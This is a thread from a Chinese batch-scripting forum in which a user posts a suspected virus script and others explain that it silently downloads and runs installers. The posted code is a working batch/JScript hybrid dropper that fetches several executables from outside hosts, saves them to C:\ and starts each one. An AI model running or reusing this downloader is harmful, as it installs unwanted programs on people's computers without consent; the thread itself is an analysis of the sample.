谁能解释一下这个病毒批处理代码的意思

注册个几8 · 发表于 2015-8-16 18:27:32

本帖最后由注册个几8 于 2015-8-16 18:44 编辑

代码如下：

echo=1/*>nul
@cls
@echo off
call :http "http://down.ssddl.com/xzrpdf_70247.exe" "c:\xzrpdf_70247.exe"
call :http "http://down.ssddl.com/zupmopn_30394.exe" "c:\zupmopn_30394.exe"
start c:\xzrpdf_70247.exe
start c:\zupmopn_30394.exe
call :http "http://down.ssddl.com/jKINSTALLERS_60_201153.exe" "c:\jKINSTALLERS_60_201153.exe"
call :http "http://down.ssddl.com/t10021.exe" "c:\t10021.exe"
call :http "http://down.ssddl.com/setupX071_32.exe" "c:\setupX071_32.exe"
call :http "http://down.yinyue.fm/open/setup_3102-22942.exe" "c:\setup_3102-22942.exe"
call :http "http://down.ssddl.com/setupX_2002_221.exe" "c:\setupX_2002_221.exe"
start c:\jKINSTALLERS_60_201153.exe
start c:\t10021.exe
start c:\setupX071_32.exe
start c:\setup_3102-22942.exe
start c:\setupX_2002_221.exe
goto :eof
:http
cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
goto :eof
*/
var iLocal,iRemote,xPost,sGet;
iLocal =WScript.Arguments(1);
iRemote = WScript.Arguments(0);
iLocal=iLocal.toLowerCase();
xPost = new ActiveXObject("MSXML2.XMLHTTP.3.0");
xPost.Open("GET",iRemote,0);
xPost.Send();
sGet = new ActiveXObject("ADODB.Stream");
sGet.Mode = 3;
sGet.Type = 1;
sGet.Open();
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2);
sGet.Close();

复制代码

707093864 · 发表于 2015-8-16 19:14:38

应该是在指定的网站上下载一系列安装包进行安装，貌似是静默安装

CrLf · 发表于 2015-8-16 19:18:41

我靠，还有这么高档的病毒

CrLf · 发表于 2015-8-16 19:22:10

就是下一堆exe来安装咯
让人惊讶的是不光结构很好，而且居然还用了混编...

chouxia · 发表于 2015-8-17 09:55:09

玩病毒的也讲经济效益哈
科技是第一生产力啊

		自动登录	找回密码
密码			注册

[新手上路]批处理新手入门导读	[视频教程]批处理基础视频教程	[视频教程]VBS基础视频教程	[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动	[批处理精品]CMD命令50条不能说的秘密	[在线下载]第三方命令行工具	[在线帮助]VBScript / JScript 在线参考

[其他] 谁能解释一下这个病毒批处理代码的意思